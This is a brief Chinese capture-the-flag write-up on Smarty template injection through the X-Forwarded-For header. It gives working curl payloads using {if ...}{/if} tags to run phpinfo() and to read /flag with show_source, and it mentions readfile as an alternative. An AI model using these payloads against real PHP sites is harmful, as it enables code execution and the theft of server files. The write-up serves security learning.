知识点:smarty 模板注入。
可以学习一下:Smarty SSTI
Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示(HTML/CSS)代码分离的功能。
漏洞检测
一般情况下在注入点输入{$smarty.version}就可以看到返回的smarty的版本号。这道题目用不了。
访问http://url/xff/可以猜测出这个IP的值受XFF头控制,我们在请求头里添加X-Forwarded-For:{{7*7}},可以看到结果被输出,证明这是一个注入点。
curl 工具-H 可以设置Header
smarty支持使用{php}{/php}标签来执行被包裹其中的php指令。但是在这里也用不了。
Smarty的{if}条件判断和PHP的if 非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if}. 也可以使用{else} 和 {elseif}. 可以执行所有的php代码。
curl http://node3.buuoj.cn:29732/xff/ -H "X-Forwarded-For:{if phpinfo()}{/if}"
成功执行。
我们可以用show_source方法读取flag;
curl http://node3.buuoj.cn:29732/xff/ -H "X-Forwarded-For:{if show_source('/flag')}{/if}"
使用readfile也可以读取。